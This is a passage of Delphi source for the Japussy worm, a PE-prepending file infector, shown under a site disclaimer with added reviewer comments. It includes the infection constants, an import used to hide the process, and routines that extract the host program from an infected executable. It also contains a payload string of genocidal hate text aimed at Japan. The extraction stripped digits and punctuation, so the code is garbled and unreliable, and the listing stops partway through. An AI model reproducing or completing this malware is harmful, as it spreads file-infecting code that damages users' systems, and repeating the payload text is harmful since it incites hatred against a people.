本文来自互联网仅供学习和研究使用后果自行负责造成的任何损失与本站无关特此声明
{ The line above is the hosting site's disclaimer: "taken from the internet,
  for study and research only; the reader bears all consequences, the site
  accepts no liability for any loss." It is not part of the program. }

{ Japussy (W32/Japussy worm) source listing — a PE-prepending file infector
  written in Delphi. This is a malware sample kept for analysis; it must not
  be built or run outside an isolated lab.
  NOTE(review): the extraction that produced this page stripped digits,
  member-access dots, commas and quote characters throughout (e.g. the
  missing literals in "HeaderSize = ;" and "ID = $;", "VerdwOSVersionInfoSize"
  for Ver.dwOSVersionInfoSize, "external Kerneldll" for the quoted DLL name).
  The tokens are reproduced exactly as found; nothing below has been
  repaired or guessed. }
program Japussy;

uses
  Windows SysUtils Classes Graphics ShellAPI{ Registry};

const
  HeaderSize = ;        // Size of the virus body prepended to the host
                        // (literal lost in extraction — do not guess it).
  IconOffset = $EB;     // Offset of the PE file's main icon
  // Measured on the author's Delphi SP build; other Delphi versions may differ.
  // The offset can be found by searching for the icon's hex byte pattern.
  {
  HeaderSize = ;        // Size of the virus body after UPX compression
  IconOffset = $BC;     // Main-icon offset in the UPX-compressed PE
  // Upx W usage: upx Japussyexe
  }
  IconSize = $E;        // Size of the PE main icon in bytes
  IconTail = IconOffset + IconSize;  // End of the PE main icon
  ID = $;               // Infection marker (literal lost in extraction)
  // Junk text kept ready to be written out by the worm.
  // NOTE(review): this is the worm's own payload string (hate text naming a
  // people and a country); it is preserved here only as a sample artifact.
  Catchword = If a race need to be killed out it must be Yamato +
              If a country need to be destroyed it must be Japan! +
              *** WJapussyWormA ***;

{$R *RES}

// Imported by name from the kernel DLL (DLL name quoting lost above).
// NOTE(review): an undocumented Win9x export; the usual purpose of calling it
// is to hide a process from the Ctrl+Alt+Del task list — the call site is not
// in this view, so treat that as an assumption to confirm.
function RegisterServiceProcess(dwProcessID dwType: Integer): Integer;
  stdcall; external Kerneldll;

var
  TmpFile: string;              // path the extracted host is written to (used elsewhere)
  Si: STARTUPINFO;              // filled by a procedure that starts after this view
  Pi: PROCESS_INFORMATION;
  IsJap: Boolean = False;       // set when the OS is Japanese (assignment not in view)

{ Returns True when the running OS reports the Win9x platform id.
  Result stays False if GetVersionEx fails. }
function IsWinx: Boolean;
var
  Ver: TOSVersionInfo;
begin
  Result := False;
  // dwOSVersionInfoSize must be set before GetVersionEx will fill the record.
  VerdwOSVersionInfoSize := SizeOf(TOSVersionInfo);
  if not GetVersionEx(Ver) then
    Exit;
  if (VerdwPlatformID = VER_PLATFORM_WIN_WINDOWS) then  // Win9x
    Result := True;
end;

{ Copies Count bytes from Src (starting at sStartPos) into Dst (starting at
  dStartPos), then restores both streams to the positions they had on entry.
  The Seek origin arguments were lost in extraction. }
procedure CopyStream(Src: TStream; sStartPos: Integer; Dst: TStream;
  dStartPos: Integer; Count: Integer);
var
  sCurPos dCurPos: Integer;
begin
  sCurPos := SrcPosition;
  dCurPos := DstPosition;
  SrcSeek(sStartPos );
  DstSeek(dStartPos );
  DstCopyFrom(Src Count);
  // Restore the callers' stream positions so this is side-effect free for them.
  SrcSeek(sCurPos );
  DstSeek(dCurPos );
end;

{ Splits the original host program out of the infected PE so it can be run:
  opens the running executable (ParamStr argument lost; presumably 0, i.e.
  the worm's own image — confirm), skips the first HeaderSize bytes (the virus
  body) and writes everything after them to FileName.
  fmShareDenyNone is needed because the image being read is currently
  executing. Every exception is swallowed by the outer try/except, so a
  failed extraction leaves no trace and no error for the caller —
  deliberate for a worm, but worth noting when tracing behaviour. }
procedure ExtractFile(FileName: string);
var
  sStream dStream: TFileStream;
begin
  try
    sStream := TFileStreamCreate(ParamStr() fmOpenRead or fmShareDenyNone);
    try
      dStream := TFileStreamCreate(FileName fmCreate);
      try
        sStreamSeek(HeaderSize );  // skip the virus body at the head of the file
        // Original form copies (Size - HeaderSize) bytes; the operator was lost.
        dStreamCopyFrom(sStream sStreamSize HeaderSize);
      finally
        dStreamFree;
      end;
    finally
      sStreamFree;
    end;
  except
  end;
end;

{ Fill the STARTUPINFO structure }
// NOTE: the procedure this comment introduces continues beyond this view.
[] [] [] [] [] |